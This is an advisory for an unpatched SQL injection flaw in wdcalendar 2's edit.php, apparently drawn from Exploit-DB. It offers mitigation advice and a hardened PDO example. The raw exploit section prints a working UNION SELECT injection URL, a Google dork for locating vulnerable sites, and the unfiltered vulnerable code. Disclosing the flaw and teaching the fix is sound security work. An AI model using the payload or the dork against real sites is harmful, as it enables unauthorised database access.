Vendor: wdcalendar
By: Alfonso Castillo Angel
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: wdcalendar
Affected Version From: Version 2
Affected Version To: Version 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 ultimate
Year: 2016

wdcalendar version 2 sql injection vulnerability

The 'id' parameter of 'edit.php' in wdcalendar version 2 is concatenated unfiltered into a SQL query, so an attacker can inject SQL through it. By appending a UNION SELECT statement to the parameter, an attacker can retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, validate user input (here, the 'id' value should be an integer) before it reaches any SQL query. Beyond that, developers should use prepared statements or parameterized queries so that user-supplied values are never interpreted as part of the SQL text.
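The following is an added example of the mitigation described above; it is not wdCalendar's own code. It rewrites the vulnerable getCalendarByRange() function using PDO prepared statements with an integer-validated, typed bound parameter. The table and column names (`jqcalendar`, `id`) come from the vulnerable code on this page; the DSN, credentials, function names and the 404 handling are assumptions for illustration.

```php
<?php
// Added example (not wdCalendar's code): hardened replacement for
// getCalendarByRange() using PDO prepared statements and input validation.
// Assumptions: PDO with the MySQL driver, table `jqcalendar` with an integer
// key column `id`; DSN and credentials below are placeholders.

declare(strict_types=1);

function getDbConnection(): PDO
{
    // Placeholder connection details; replace with the deployment's own.
    $dsn = 'mysql:host=localhost;dbname=wdcalendar;charset=utf8mb4';
    return new PDO($dsn, 'DB_USER_PLACEHOLDER', 'DB_PASSWORD_PLACEHOLDER', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // Disable client-side emulation so the server receives a real
        // prepared statement and the value is never spliced into SQL text.
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ,
    ]);
}

/**
 * Returns the calendar row for $rawId, or null if it is invalid or absent.
 *
 * @param mixed $rawId  untrusted value taken straight from $_GET['id']
 */
function getCalendarByRangeSafe(PDO $pdo, $rawId): ?object
{
    // Validation: `id` is an integer key, so anything that is not a
    // non-negative integer is rejected before the database is touched.
    // filter_var() returns false for "-1 union select ...", "", arrays, etc.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return null;
    }

    // Parameterization: the SQL text is fixed; the value travels separately
    // with an explicit integer type, so it can never be parsed as SQL.
    $stmt = $pdo->prepare('SELECT * FROM `jqcalendar` WHERE `id` = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// Usage in edit.php: same request-handling shape as the original, with the
// untrusted value passed through the safe function.
if (isset($_GET['id'])) {
    $pdo   = getDbConnection();
    $event = getCalendarByRangeSafe($pdo, $_GET['id']);
    if ($event === null) {
        http_response_code(404);
        exit('Event not found');
    }
    // ... render $event ...
}
```

Two design points: the integer validation is a defense in depth, not the primary control; the prepared statement alone already prevents injection, but rejecting non-integer ids also stops the request before it reaches the database and gives a clean 404 instead of a query error. The original code uses the mysql_* extension, which was removed in PHP 7; PDO (or mysqli with prepared statements) is the replacement on any current PHP version.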
Source

Exploit-DB raw data:

# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps

 * Affected file -> edit.php and edit.db.php
 * Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--


 * Vulnerable code:

 function getCalendarByRange($id){
   try{
     $db = new DBConnection();
     $db->getConnection();
     $sql = "select * from `jqcalendar` where `id` = " . $id;  //the variable is not filtered properly
     $handle = mysql_query($sql);
     //echo $sql;
     $row = mysql_fetch_object($handle);
   }catch(Exception $e){
   }
   return $row;
 }
 if($_GET["id"]){
   $event = getCalendarByRange($_GET["id"]); //the variable is not filtered properly
   // ...
 }